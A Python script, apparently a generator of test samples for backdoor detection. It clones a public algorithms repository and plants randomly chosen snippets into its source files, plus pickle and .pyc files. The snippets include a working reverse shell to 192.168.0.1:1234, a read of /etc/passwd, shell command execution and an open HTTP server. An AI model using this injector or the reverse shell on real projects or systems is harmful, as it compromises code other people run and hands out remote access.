187 lines
		
	
	
		
			4.9 KiB
		
	
	
	
		
			Python
		
	
	
	
	
	
			
		
		
	
	
			187 lines
		
	
	
		
			4.9 KiB
		
	
	
	
		
			Python
		
	
	
	
	
	
| from typing import Tuple, List
 | |
| from git import Repo  # type: ignore
 | |
| import random
 | |
| from pathlib import Path
 | |
| import pickle
 | |
| import os
 | |
| import py_compile
 | |
| 
 | |
| 
 | |
| def clone_repo(repo_url: str, clone_dir: str) -> None:
 | |
|     """
 | |
|     Clone a Git repository to the specified directory.
 | |
| 
 | |
|     Args:
 | |
|         repo_url (str): The URL of the Git repository to clone.
 | |
|         clone_dir (str): The directory where the repository should be cloned.
 | |
|     """
 | |
|     try:
 | |
|         Repo.clone_from(repo_url, clone_dir, depth=1)
 | |
|     except Exception as e:
 | |
|         print(f"Error cloning repository: {e}")
 | |
| 
 | |
| 
 | |
| # a return type of backdoor. Include injected file name and number.
 | |
| 
 | |
| 
 | |
| def inject_random_backdoor(
 | |
|     path: str, sample_rate: float = 0.1
 | |
| ) -> Tuple[Tuple[str, int], ...]:
 | |
|     """
 | |
|     Insert random backdoor into the path.
 | |
| 
 | |
|     Args:
 | |
|         path (str): The path to the repository to insert the backdoor into.
 | |
|         pickle (bool): Whether to insert a backdoor into a pickle file.
 | |
|         pyc (bool): Whether to insert a backdoor into a compiled Python file.
 | |
|     """
 | |
|     project_path = Path(path)
 | |
|     all_python_files = list(project_path.rglob("*.py"))
 | |
|     injected_python_files = []
 | |
| 
 | |
|     for python_file in all_python_files:
 | |
|         # sample files to inject backdoor
 | |
|         if random.random() < sample_rate:
 | |
|             injected_python_files.append(python_file)
 | |
|     injectedNum = len(injected_python_files)
 | |
| 
 | |
|     results: List[Tuple[str, int]] = []
 | |
|     # inject backdoor
 | |
|     for python_file in injected_python_files:
 | |
|         with open(python_file, "r+", errors="ignore") as f:
 | |
|             lines = f.readlines()
 | |
|             total_lines = len(lines)
 | |
|             inject_line_number = random.randint(0, total_lines)
 | |
|             # choose random backdoor
 | |
|             inject_code = random.choice(backdoors)
 | |
|             lines.insert(inject_line_number, inject_code + "\n")
 | |
|             f.seek(0)
 | |
|             f.writelines(lines)
 | |
|             results.append((str(python_file), inject_line_number))
 | |
| 
 | |
|     return tuple(results)
 | |
| 
 | |
| 
 | |
| # 示例1: 通过 os.system 执行命令
 | |
| backdoor1 = """
 | |
| import os
 | |
| os.system('ls')
 | |
| """
 | |
| 
 | |
| # 示例2: 通过 subprocess 模块执行命令
 | |
| backdoor2 = """
 | |
| import subprocess
 | |
| subprocess.call(['ls', '-l'])
 | |
| """
 | |
| 
 | |
| # 示例3: 打开一个反向 shell
 | |
| backdoor3 = """
 | |
| import socket,subprocess,os
 | |
| s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 | |
| s.connect(("192.168.0.1",1234))
 | |
| os.dup2(s.fileno(),0)
 | |
| os.dup2(s.fileno(),1)
 | |
| os.dup2(s.fileno(),2)
 | |
| subprocess.call(["/bin/sh","-i"])
 | |
| """
 | |
| 
 | |
| # 示例4: 通过 eval 执行任意代码
 | |
| backdoor4 = """
 | |
| code = "print('Hello, World!')"
 | |
| eval(code)
 | |
| """
 | |
| 
 | |
| # 示例5: 通过 exec 执行任意代码
 | |
| backdoor5 = """
 | |
| code = '''
 | |
| import os
 | |
| os.system('ls')
 | |
| '''
 | |
| exec(code)
 | |
| """
 | |
| 
 | |
| # 示例6: 简单的 HTTP 服务器后门
 | |
| backdoor6 = """
 | |
| import http.server
 | |
| import socketserver
 | |
| 
 | |
| PORT = 8000
 | |
| 
 | |
| Handler = http.server.SimpleHTTPRequestHandler
 | |
| 
 | |
| with socketserver.TCPServer(("", PORT), Handler) as httpd:
 | |
|     print("serving at port", PORT)
 | |
|     httpd.serve_forever()
 | |
| """
 | |
| 
 | |
| # 示例7: 读取并显示文件内容
 | |
| backdoor7 = """
 | |
| with open('/etc/passwd', 'r') as file:
 | |
|     data = file.read()
 | |
|     print(data)
 | |
| """
 | |
| 
 | |
| # 示例8: 无限循环
 | |
| backdoor8 = """
 | |
| while True:
 | |
|     print("This is a backdoor.")
 | |
| """
 | |
| 
 | |
| backdoors = [
 | |
|     backdoor1,
 | |
|     backdoor2,
 | |
|     backdoor3,
 | |
|     backdoor4,
 | |
|     backdoor5,
 | |
|     backdoor6,
 | |
|     backdoor7,
 | |
|     backdoor8,
 | |
| ]
 | |
| 
 | |
| 
 | |
| def inject_pickle_backdoor(root_path: str) -> None:
 | |
|     """
 | |
|     Generate a pickle backdoor and insert it into the specified path.
 | |
| 
 | |
|     Args:
 | |
|         path (str): The path to the repository to insert the backdoor into.
 | |
|     """
 | |
|     all_path = [str(p) for p in Path(root_path).glob("*") if p.is_dir()]
 | |
|     paths = random.sample(all_path, random.randrange(1, len(all_path)))
 | |
|     for path in paths:
 | |
|         backdoor_id = random.randrange(0, len(backdoors))
 | |
|         backdoor = backdoors[backdoor_id]
 | |
|         filename = os.path.join(path, f"backdoor{backdoor_id}.pickle")
 | |
|         with open(filename, "wb") as f:
 | |
|             pickle.dump(backdoor, f)
 | |
| 
 | |
| 
 | |
| def inject_pyc_backdoor(root_path: str) -> None:
 | |
|     """
 | |
|     Generate a pyc backdoor and insert it into the specified path.
 | |
| 
 | |
|     Args:
 | |
|         path (str): The path to the repository to insert the backdoor into.
 | |
|     """
 | |
|     all_path = [str(p) for p in Path(root_path).glob("*") if p.is_dir()]
 | |
|     paths = random.sample(all_path, random.randrange(1, len(all_path)))
 | |
| 
 | |
|     for path in paths:
 | |
|         backdoor_id = random.randrange(0, len(backdoors))
 | |
|         backdoor = backdoors[backdoor_id]
 | |
|         py_filename = os.path.join(path, f"backdoor{backdoor_id}.py")
 | |
|         pyc_filename = os.path.join(path, f"backdoor{backdoor_id}.pyc")
 | |
|         with open(py_filename, "w") as f:
 | |
|             f.write(backdoor)
 | |
| 
 | |
|         py_compile.compile(py_filename, cfile=pyc_filename)
 | |
|         os.remove(py_filename)
 | |
| 
 | |
| 
 | |
| if __name__ == "__main__":
 | |
|     repo_url = "https://github.com/TheAlgorithms/Python.git"
 | |
|     clone_dir = "/tmp/repo"
 | |
|     clone_repo(repo_url, clone_dir)
 | |
|     inject_random_backdoor(clone_dir)
 | |
|     inject_pickle_backdoor(clone_dir)
 |